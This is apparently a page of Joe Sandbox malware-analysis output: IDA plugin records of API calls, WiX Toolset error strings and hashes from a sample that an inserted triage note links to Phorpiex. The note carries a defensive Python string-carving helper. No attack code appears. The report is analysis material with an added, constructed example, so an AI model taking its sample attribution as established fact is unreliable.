                                                                                                                                                          • Opcode ID: f310cc7da7fabd1159f23cd025eb4f2fb55d4e2cd08050b7d727fbf9b2787d4d
                                                                                                                                                          • Instruction ID: 51438fda0da58f014d712d197603c309d2026f13f7085956d0f6e937570656ed
                                                                                                                                                          • Opcode Fuzzy Hash: f310cc7da7fabd1159f23cd025eb4f2fb55d4e2cd08050b7d727fbf9b2787d4d
                                                                                                                                                          • Instruction Fuzzy Hash: 5941EB72A402257BE7305B54CD49F9B3B68EB05B31F51816AFF08FB2D1D6B89D0097A8
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemWindowsDirectoryW.KERNEL32(00000000,00000105), ref: 0046D33D
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0047097F,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019), ref: 0046D349
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 0046D326, 0046D36D, 0046D373, 0046D384, 0046D3E6, 0046D3EB, 0046D459
                                                                                                                                                          • Failed to alloc Windows directory path., xrefs: 0046D317
                                                                                                                                                          • Failed to get Windows directory path with returned size., xrefs: 0046D3F1
                                                                                                                                                          • Failed to concat subdirectory on Windows directory path., xrefs: 0046D424
                                                                                                                                                          • Failed to get Windows directory path with default size., xrefs: 0046D379
                                                                                                                                                          • Failed to realloc Windows directory path., xrefs: 0046D39F
                                                                                                                                                          • Failed to terminate Windows directory path with backslash., xrefs: 0046D44A
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectoryErrorLastSystemWindows
                                                                                                                                                          • String ID: Failed to alloc Windows directory path.$Failed to concat subdirectory on Windows directory path.$Failed to get Windows directory path with default size.$Failed to get Windows directory path with returned size.$Failed to realloc Windows directory path.$Failed to terminate Windows directory path with backslash.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                          • API String ID: 505562763-4103698096
                                                                                                                                                          • Opcode ID: c51354a6fc7e4cb531487bda56b08e07c15df5e754cb15e180431d70b97503fc
                                                                                                                                                          • Instruction ID: ff7623fce04fab4e9aa9a6d7b57dd934e21ebeadee0100f80abdd692fc46588b
                                                                                                                                                          • Opcode Fuzzy Hash: c51354a6fc7e4cb531487bda56b08e07c15df5e754cb15e180431d70b97503fc
                                                                                                                                                          • Instruction Fuzzy Hash: 9D41F532F80324B3E72156958C4AFAF29689B51B61F124067BD04BF3C1FA7C9D4096EE
APIs
• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0041D2D6
• GetLastError.KERNEL32 ref: 0041D2E6
• CloseHandle.KERNEL32(?), ref: 0041D432
Strings
Similarity
• API ID: CloseCreateErrorFileHandleLast
• String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$Payload has no verification information: %ls$d:\a\wix\wix\src\burn\engine\cache.cpp
• API String ID: 2528220319-4266522734
• Opcode ID: db83e1788a7f0bfd3f5b6237737e8782c360b98bfefc65c5ecadcf91edcf7358
• Instruction ID: 6bdb4caa7bcc6f723cd6b4609e4c0e55593c02e0b0169ca98780fbfbc8089e11
• Opcode Fuzzy Hash: db83e1788a7f0bfd3f5b6237737e8782c360b98bfefc65c5ecadcf91edcf7358
• Instruction Fuzzy Hash: 1641EA72A40255BBDF226E94CC46FEF3E29EB45B20F11011AFE14791D1D2BDC86097AD
APIs
• GetSystemWow64DirectoryW.KERNEL32(?,00000105,?,00000105), ref: 00406A29
• GetLastError.KERNEL32 ref: 00406A35
Strings
• Failed to get max length of input buffer., xrefs: 00406A0C
• Failed to get system wow64 directory path with default size., xrefs: 00406A65
• Failed to get system wow64 directory path with returned size., xrefs: 00406B00
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00406A59, 00406A5F, 00406A70, 00406AF5, 00406AFA, 00406B36
• Failed to realloc system wow64 directory path., xrefs: 00406AB2
• Failed to terminate system wow64 directory path with backslash., xrefs: 00406B27
• Failed to allocate space for system wow64 directory., xrefs: 00406A8B
Similarity
• API ID: DirectoryErrorLastSystemWow64
• String ID: Failed to allocate space for system wow64 directory.$Failed to get max length of input buffer.$Failed to get system wow64 directory path with default size.$Failed to get system wow64 directory path with returned size.$Failed to realloc system wow64 directory path.$Failed to terminate system wow64 directory path with backslash.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
• API String ID: 1255099494-3585685225
• Opcode ID: 2dbe3bd4be10e6bdde409f58cede6832cc86863ae2d9a9743c3cb199efd911bc
• Instruction ID: fecc8043bf5c04773a04c9a1df35ed23b0e6571595df03d9ba51ec75778b7d20
• Opcode Fuzzy Hash: 2dbe3bd4be10e6bdde409f58cede6832cc86863ae2d9a9743c3cb199efd911bc
• Instruction Fuzzy Hash: 613106B2B8073173E73166458C49F6B2968DB41B60F138176BA06BB2C1E57C9C1086ED
APIs
• GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004068C6
• GetLastError.KERNEL32(?,?,?,?,00401946,?,?,00000000,?,?,?,00401925,?,00000000,00000000,?), ref: 004068D2
Strings
• Failed to allocate space for system directory., xrefs: 00406928
• Failed to get system directory path with returned size., xrefs: 0040699C
• Failed to get max length of input buffer., xrefs: 004068A9
• Failed to get system directory path with default size., xrefs: 00406902
• Failed to realloc system directory path., xrefs: 0040694E
• Failed to terminate system directory path with backslash., xrefs: 004069C2
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 004068F6, 004068FC, 0040690D, 00406991, 00406996, 004069D1
Similarity
• API ID: DirectoryErrorLastSystem
• String ID: Failed to allocate space for system directory.$Failed to get max length of input buffer.$Failed to get system directory path with default size.$Failed to get system directory path with returned size.$Failed to realloc system directory path.$Failed to terminate system directory path with backslash.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
• API String ID: 3081803543-4239660824
• Opcode ID: 4ff10befd06974c14344a7be8e8859b2bb833e61a3d79360bbe1efbf1b352b5f
• Instruction ID: b3c2c8692fb92cfa496c0008e2e3880ceefd9ac42e41db7ea08de02fa384da0f
• Opcode Fuzzy Hash: 4ff10befd06974c14344a7be8e8859b2bb833e61a3d79360bbe1efbf1b352b5f
• Instruction Fuzzy Hash: 1D3105B2B8173577E72126458D4AFAB6A58CB00BA4F13407BFE05BB2D1E6BC9C1045ED
APIs
• SetProcessShutdownParameters.KERNEL32(000003FF,00000000,?,00000000,?,?,?,?,00000000,00000001), ref: 0042C1CC
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0042C1D7
• GetLastError.KERNEL32 ref: 0042C1E4
• CreateThread.KERNEL32(00000000,00000000,0042BDF0,?,00000000,00000000), ref: 0042C24C
• GetLastError.KERNEL32 ref: 0042C259
• WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF), ref: 0042C29F
• CloseHandle.KERNEL32(00000000), ref: 0042C2B8
• CloseHandle.KERNEL32(?), ref: 0042C2C9
Strings
Similarity
• API ID: CloseCreateErrorHandleLast$EventMultipleObjectsParametersProcessShutdownThreadWait
• String ID: Failed to create initialization event.$Failed to create the UI thread.$d:\a\wix\wix\src\burn\engine\uithread.cpp
• API String ID: 665835008-1681362092
• Opcode ID: 8b085b555c7b712e538ce2749eec46d96211a9e80366076acf628873d989a66f
• Instruction ID: bd3644c3b1314cb2e030eff6ee8321cfa37ced79fdfcde01389575528aa9dc71
• Opcode Fuzzy Hash: 8b085b555c7b712e538ce2749eec46d96211a9e80366076acf628873d989a66f
• Instruction Fuzzy Hash: B5312A76E40229FBE7119BD89D85BAFBA78AB00750F5100B7BD04F7280D6788D4087A9
APIs
Strings
Similarity
• API ID: Variant$AllocClearInitString
• String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed put_preserveWhiteSpace$failed put_resolveExternals$failed put_validateOnParse$failed to allocate bstr for Path in XmlLoadDocumentFromFileEx$failed to load XML from: %ls
• API String ID: 2213243845-2612819061
• Opcode ID: 5f8b97d621b77ae921f8632bc8a519700fe904b81237e10cf8901d0c8f235d6e
• Instruction ID: c9d56f9f365576a1a789e05b13610cd06c861a3abde34ffcf5a3eb2e68c91cf0
• Opcode Fuzzy Hash: 5f8b97d621b77ae921f8632bc8a519700fe904b81237e10cf8901d0c8f235d6e
• Instruction Fuzzy Hash: 0551F235B40215ABDB119F64CC49F6E3769EF85B10F11406AFE05FB290EBB899408BDA
APIs
  • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,-80000001,00000000,00000000,004221A7), ref: 0046F6F0
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,-80000001,00000000,00000000,004221A7), ref: 0046F703
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open the registry key "%ls". The dependency store is corrupt., xrefs: 0046F5BD
                                                                                                                                                          • Failed to add the dependent key "%ls" to the string array., xrefs: 0046F725
                                                                                                                                                          • Failed to enumerate the dependents key of "%ls"., xrefs: 0046F74D
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046F56F, 0046F66D, 0046F75C
                                                                                                                                                          • Failed to open the registry key for dependents of "%ls"., xrefs: 0046F612
                                                                                                                                                          • Failed to get the name of the dependent from the key "%ls"., xrefs: 0046F739
                                                                                                                                                          • Failed to allocate the registry key for dependency "%ls"., xrefs: 0046F560
                                                                                                                                                          • Failed to check the dictionary of ignored dependents., xrefs: 0046F65E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close$lstrlen
                                                                                                                                                          • String ID: Failed to add the dependent key "%ls" to the string array.$Failed to allocate the registry key for dependency "%ls".$Failed to check the dictionary of ignored dependents.$Failed to enumerate the dependents key of "%ls".$Failed to get the name of the dependent from the key "%ls".$Failed to open the registry key "%ls". The dependency store is corrupt.$Failed to open the registry key for dependents of "%ls".$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                          • API String ID: 1752758355-1257772225
                                                                                                                                                          • Opcode ID: 73cdbc52bee6e4cd7de7f6aadf28e81fbe2c8d9fdc97301b8458bca27224bfea
                                                                                                                                                          • Instruction ID: 5dcaf32bd08c2c7a98abcf54ab1bca8d303b1e020c4f5224fd66d55cd95aee90
                                                                                                                                                          • Opcode Fuzzy Hash: 73cdbc52bee6e4cd7de7f6aadf28e81fbe2c8d9fdc97301b8458bca27224bfea
                                                                                                                                                          • Instruction Fuzzy Hash: A351F332D40229FBEB22AA90DC06FAF7A649B00715F114132F941B91E1E37C4E55DA9B
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000001,00000000,00000001,00000000,000000B0,00000000,00020006,00000000,00000000,00000000,00000001,00000000,000000B0,?,00000000,00000000), ref: 0046FD4C
                                                                                                                                                          • RegCloseKey.ADVAPI32(000000B0,00000000,00000001,00000000,000000B0,00000000,00020006,00000000,00000000,00000000,00000001,00000000,000000B0,?,00000000,00000000), ref: 0046FD6A
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set the %ls registry value to "%ls"., xrefs: 0046FCC2, 0046FCF3
                                                                                                                                                          • Failed to set the %ls registry value to %d., xrefs: 0046FD27
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046FBDE, 0046FC90, 0046FD36
                                                                                                                                                          • %ls\%ls, xrefs: 0046FC33
                                                                                                                                                          • Failed to allocate the registry key for dependency "%ls"., xrefs: 0046FBCF
                                                                                                                                                          • Failed to allocate dependent subkey "%ls" under dependency "%ls"., xrefs: 0046FC4D
                                                                                                                                                          • Failed to create the dependency subkey "%ls"., xrefs: 0046FC81
                                                                                                                                                          • Failed to create the dependency registry key "%ls"., xrefs: 0046FC16
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close$lstrlen
                                                                                                                                                          • String ID: %ls\%ls$Failed to allocate dependent subkey "%ls" under dependency "%ls".$Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to create the dependency subkey "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                          • API String ID: 1752758355-610600026
                                                                                                                                                          • Opcode ID: 9c4ef1289bbcc281a2bf2f48b18d95763f2b96d831e9074dd405e2af35e76883
                                                                                                                                                          • Instruction ID: c5c933ddd0a7aa06a163a3a1a8848142e0c4916e2f5e4dba23978b7cbbc66bcb
                                                                                                                                                          • Opcode Fuzzy Hash: 9c4ef1289bbcc281a2bf2f48b18d95763f2b96d831e9074dd405e2af35e76883
                                                                                                                                                          • Instruction Fuzzy Hash: B851BF72E40219BBEF225F81DC46FAF7F39AB05754F11012AFA01751A0E3789A20DB5A
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(00000000,00000001,BundleUpgradeCode,00000000,000000B0,00000000,00000000,00000001,?,?,?,?,00000000,?,?,00421F73), ref: 004687F9
                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00000001,00000000,?,00000001,BundleUpgradeCode,00000000), ref: 00468882
                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,00000000,?,?,00421F73,?,00000001,?), ref: 0046890B
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set registry value to array of strings (first string of which is): %ls, xrefs: 0046893B
                                                                                                                                                          • DWORD Overflow while adding length of string to write REG_MULTI_SZ, xrefs: 00468837
                                                                                                                                                          • BundleUpgradeCode, xrefs: 004687DA
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00468846, 004688E7, 0046892F, 00468934, 0046894A
                                                                                                                                                          • Failed to allocate space for string while writing REG_MULTI_SZ, xrefs: 00468826
                                                                                                                                                          • failed to copy string: %ls, xrefs: 004688D8
                                                                                                                                                          • Failed to get total string size in bytes, xrefs: 004688C4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrlen$Value
                                                                                                                                                          • String ID: BundleUpgradeCode$DWORD Overflow while adding length of string to write REG_MULTI_SZ$Failed to allocate space for string while writing REG_MULTI_SZ$Failed to get total string size in bytes$Failed to set registry value to array of strings (first string of which is): %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp$failed to copy string: %ls
                                                                                                                                                          • API String ID: 198323757-2606691585
                                                                                                                                                          • Opcode ID: a631047de076b8a430b1d60ad74cd235b81ee2898a5ffdeee05f849be32ac03b
                                                                                                                                                          • Instruction ID: 9f2f58a495da3ac94f04f3d15cb9a473812a99eec76083a7adcda229eec7b145
                                                                                                                                                          • Opcode Fuzzy Hash: a631047de076b8a430b1d60ad74cd235b81ee2898a5ffdeee05f849be32ac03b
                                                                                                                                                          • Instruction Fuzzy Hash: 8441C571A40315BBEB11EE55CC4AF6F7769EB85701F11016FFA00BB2C1FA789901876A
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,log,000000FF,000000B0,8000FFFF,00000000,?,00000000,00000001,8000FFFF,00000000,000000B0,00000000), ref: 00421B9C
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,00486CB8,000000FF), ref: 00421BC1
                                                                                                                                                          Strings
                                                                                                                                                          • -log "[%ls]", xrefs: 00421BDC
                                                                                                                                                          • log, xrefs: 00421B8E
                                                                                                                                                          • Failed creating log argument, xrefs: 00421BF0
                                                                                                                                                          • Failed to format argument string., xrefs: 00421C1F
                                                                                                                                                          • Failed concatenating '-log' to obfuscated command line, xrefs: 00421C71
                                                                                                                                                          • Failed parsing command line, xrefs: 00421B4B
                                                                                                                                                          • Failed concatenating '-log' to command line, xrefs: 00421C48
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\core.cpp, xrefs: 00421B5D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: -log "[%ls]"$Failed concatenating '-log' to command line$Failed concatenating '-log' to obfuscated command line$Failed creating log argument$Failed parsing command line$Failed to format argument string.$d:\a\wix\wix\src\burn\engine\core.cpp$log
                                                                                                                                                          • API String ID: 1825529933-1020064687
                                                                                                                                                          • Opcode ID: 0933f6da78bf70001da1f05a20ca5b6c5332a976fc4dd4588de9f8cafd68a626
                                                                                                                                                          • Instruction ID: 36924d55256fff67e9e5b69b5f94727d6f1691683f0e611af2ffcb45fc4f1415
                                                                                                                                                          • Opcode Fuzzy Hash: 0933f6da78bf70001da1f05a20ca5b6c5332a976fc4dd4588de9f8cafd68a626
                                                                                                                                                          • Instruction Fuzzy Hash: B741D435B80234B6DB219E85DC46F9F7A74EB11711F510267FA15BB2E0D678A940C788
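                                                                                                                                                          Triage note on the records above. Every function listed here carries WiX Toolset build-server source paths: deputil.cpp, regutil.cpp and xmlutil.cpp under libs\dutil (WiX's shared utility library) and core.cpp under burn\engine (the Burn bootstrapper engine). That tells an analyst these routines are statically linked installer-framework code rather than logic specific to the Phorpiex detection, so effort is better spent on functions that do not carry such paths. The following is an added example, not code from the Joe Sandbox report or from the WiX project: a small Python helper that carves ASCII and UTF-16LE strings from a memory-dump slice or PE and groups the WiX source paths it finds. The path pattern is taken from the strings on this page; the SAMPLE buffer is constructed for the demonstration and is not bytes from the analysed file; the report does not state which encoding each string uses, so both encodings are scanned; the script name wix_triage.py in the usage comment is hypothetical.

```python
import re
from collections import defaultdict

# WiX Toolset build-server source paths, as they appear in the report's
# "Strings" entries, e.g. d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
WIX_PATH_RE = re.compile(r"d:\\a\\wix\\wix\\src\\([\w.\\-]+?\.cpp)", re.IGNORECASE)

# Minimum printable run length for string carving; 8 keeps most noise out.
MIN_LEN = 8


def carve_strings(buf: bytes, min_len: int = MIN_LEN):
    """Yield (offset, char_width, text) for printable ASCII and UTF-16LE runs.

    The report does not say which encoding each string uses (the "%ls" format
    strings are typically narrow, registry value names wide), so both are scanned.
    """
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_re.finditer(buf):
        yield m.start(), 1, m.group().decode("ascii")
    for m in wide_re.finditer(buf):
        yield m.start(), 2, m.group().decode("utf-16le")


def wix_source_files(buf: bytes) -> dict:
    """Map each WiX source file referenced in buf to the byte offsets of its path.

    Keys are lower-cased paths relative to src\\, e.g.
    'libs\\dutil\\wixtoolset.dutil\\regutil.cpp' or 'burn\\engine\\core.cpp'.
    """
    found = defaultdict(list)
    for off, width, text in carve_strings(buf):
        for m in WIX_PATH_RE.finditer(text):
            # Convert the match position back to a byte offset in buf.
            found[m.group(1).lower()].append(off + width * m.start())
    return {k: sorted(v) for k, v in found.items()}


def classify(buf: bytes) -> dict:
    """Summarise what the paths imply for triage.

    libs\\dutil\\* -> WiX's shared utility library (registry, XML, dependency
    helpers); burn\\engine\\* -> the Burn bootstrapper engine. Any burn\\engine
    hit means the binary embeds the Burn engine itself.
    """
    files = wix_source_files(buf)
    return {
        "dutil": sorted(f for f in files if f.startswith("libs\\dutil\\")),
        "burn_engine": sorted(f for f in files if f.startswith("burn\\engine\\")),
        "is_burn_bundle": any(f.startswith("burn\\engine\\") for f in files),
    }


# Constructed stand-in for a memory-dump slice; NOT bytes from the analysed sample.
# It mixes a narrow source path and error message with wide strings, padded with
# non-printable filler so the carver has run boundaries to respect.
SAMPLE = (
    b"\x00" * 16
    + b"d:\\a\\wix\\wix\\src\\libs\\dutil\\wixtoolset.dutil\\deputil.cpp\x00"
    + b'Failed to open the registry key "%ls". The dependency store is corrupt.\x00'
    + b"\x90" * 8
    + "BundleUpgradeCode".encode("utf-16le") + b"\x00\x00"
    + "d:\\a\\wix\\wix\\src\\burn\\engine\\core.cpp".encode("utf-16le") + b"\x00\x00"
    + b"\xcc" * 8
)


if __name__ == "__main__":
    # Typical use: python wix_triage.py <dump.sdmp or sample.exe>; with no
    # argument the constructed SAMPLE buffer is scanned instead.
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for path, offsets in sorted(wix_source_files(data).items()):
        print(f"{path:55s} {', '.join(hex(o) for o in offsets)}")
    print(classify(data))
```

                                                                                                                                                          Run against the .sdmp files linked from the "Memory Dump Source" entries, the offsets let you cross-reference each path to the xrefs the IDA plugin lists, and a function whose error strings resolve to a WiX source file can be deprioritised in favour of those that do not.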
                                                                                                                                                          APIs
                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000040,?,00000040,00000000,00000000,0100147D,?,?,?,0040616B,?,?,?,00000000), ref: 00407A1E
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0040616B,?,?,?,00000000), ref: 00407A2A
                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,0040616B,?,?,?,00000000), ref: 00407AC7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0040616B,?,?,?,00000000), ref: 00407AD3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentErrorExpandLastStrings
                                                                                                                                                          • String ID: Failed to allocate buffer for expanded string.$Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\envutil.cpp
                                                                                                                                                          • API String ID: 4064601616-1301571406
                                                                                                                                                          • Opcode ID: b386e8639d9b15609583888c6a865d0ee4f60cff2c0085b57ddce0530fabd041
                                                                                                                                                          • Instruction ID: 01f642bb089f81db316f3f181cc2559917eb20a1b9cd7cac164a66d6cf4062e3
                                                                                                                                                          • Opcode Fuzzy Hash: b386e8639d9b15609583888c6a865d0ee4f60cff2c0085b57ddce0530fabd041
                                                                                                                                                          • Instruction Fuzzy Hash: 2E41DD36F8432473D73256558C49F5F3E689B41BA0F114077FA087E2D1E57CAE01CA9A
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0046B1A5
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0046B1DF
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0046B2F0
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046B2FB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                          • String ID: Failed getNamedItem in XmlGetAttribute(%ls)$Failed get_attributes.$Failed get_nodeValue in XmlGetAttribute(%ls)$Failed to allocate attribute name BSTR.$Failed to copy attribute value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                          • API String ID: 760788290-2893514785
                                                                                                                                                          • Opcode ID: e67bb97bb647ff56a366137ba8d90f276f02aabc0407f7c06bb81fee3795556d
                                                                                                                                                          • Instruction ID: 5ba22b86d75fee3b8b481e2df1ea61a8ec20de19fe37a6b1cf75605199bac07e
